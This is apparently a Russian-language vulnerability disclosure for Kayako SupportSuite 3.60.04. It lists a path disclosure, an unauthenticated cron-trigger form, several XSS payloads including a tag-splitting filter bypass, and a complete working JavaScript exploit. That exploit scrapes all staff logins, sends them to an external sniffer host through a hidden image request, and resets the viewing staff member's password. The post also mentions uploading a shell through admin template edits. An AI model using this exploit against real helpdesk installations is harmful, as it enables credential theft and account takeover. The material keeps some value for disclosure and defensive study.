[Product]
######################################
Kayako SupportSuite version 3.60.04
[Url]
######################################
http://www.kayako.com/solutions/supportsuite/
[Path Disclosure]
######################################
http://supportsite/rss/index.php?_m=tickets&_a=view&group=default
Fatal error: view action is not registered in \includes\functions.php on line 754
P.S. Только если не давится вывод ошибок
[Cron]
######################################
Неавторизованный запуск задач внутреннего крона данного продукта
Код:
<form action="http://supportsite/cron/index.php" method="post">
<input value="d" name="_t">
<input type="submit">
</form>
Пример: tickets
При ссылке в action: http://supportsite/cron/index.php?debug=1
Получаем:
======== cron_autoclose.php ========
1: Autoclose system is enabled, starting up...
2: List of autoclose statuses:
3: List of departments monitored by autoclose system:
4: Auto close target status: NNN
5: ======== end cron_autoclose.php ========
Как использовать не придумал.
[Xss]
######################################
1. Против обычного пользователя:
Не фильтруется название темы [пример темы: <script>alert('xss')</script>] в тикете, и при обращении по ссылке [Post Reply][http://supportsite/index.php?_m=tickets&_a=postreply&ticketid=NNN] отрабатывает XSS
2. Против стаффа/админа - возможность оставить ссылку в теле тикета:
<a href="http://evilsite/evipage.html">Link text</a>
где возможно размещение iframe с кодом
http://supportsite/staff/index.php?_m=tickets&_a=reports&type=department&da tefrom=0"><script>alert('xss')</script><t
[Xss exploit]
######################################
Не фильтруются XSS вида <scr<img>ipt>alert('xss')</scr<img>ipt>
Тоже xss, позволяет пользователю отправить тикет со скриптом внутри, который выполнит любой сценарий с правами залогиненного администратора или стаффа
Также при любом типе стаффа можно узнать все логины, имеющиеся в системе, используя информацию со страницы с отправкой приватных сообщений.
Ну и используя вышеперечисленное, написал сплоит, который берет все логины из системы, снифит их на внешний сервер, и меняет пароль того, под кем был просмотрен тикет
В том случае, если пользователь имеет права администратора (можно определить по значениям id в cookie), то возможно влить шелл через изменение темплейтов в админке.
Код:
<scr<img>ipt>window.onload=init; function init() {document.body.innerHTML +=('<in<img>put id="change" value="0" type="hidden">');document.body.innerHTML += ('<ifr<img>ame id="loginframe" name="loginframe" style="display:none;" src="http://supportsite/staff/index.php?_m=core&_a=composeprvmsg" onload="login();"></ifr<img>ame>');}function login() {if (document.getElementById('change').value==0) {var opt = window.frames['loginframe'].document.forms['swiftform'].elements['staffid[]'].innerHTML;opt = opt.split('OPTION').join('');opt = opt.split('<').join('');opt = opt.split('>').join('');opt = opt.split('"').join('');opt = opt.split('=').join('');opt = opt.split('selected').join('');opt = opt.split('value').join('');opt = opt.split('option').join('');opt = "http://sniffsite/snif/s.gif?users=" + escape(opt); document.body.innerHTML += ('<im<img>g name=imname src="'+opt+'" width="0" height="0" border="0">'); document.imname.src = opt+"&"+Math.random(); document.getElementById('change').value = 1;init2(); }}; function init2() {document.body.innerHTML +=('<in<img>put id="change2" value="0" type="hidden">');document.body.innerHTML += ('<ifr<img>ame id="passframe" name="passframe" style="display:none;" src="http://supportsite/staff/index.php?_m=core&_a=changepassword" onload="pass();"></ifr<img>ame>');}function pass() {if (document.getElementById('change2').value==0) {window.frames['passframe'].document.forms['staffform'].elements['password'].value = 'newpass';window.frames['passframe'].document.forms['staffform'].elements['passwordconfirm'].value = 'newpass';window.frames['passframe'].document.forms['staffform'].submit();document.getElementById('change2').value = 1;}}</sc<img>ript>
######################################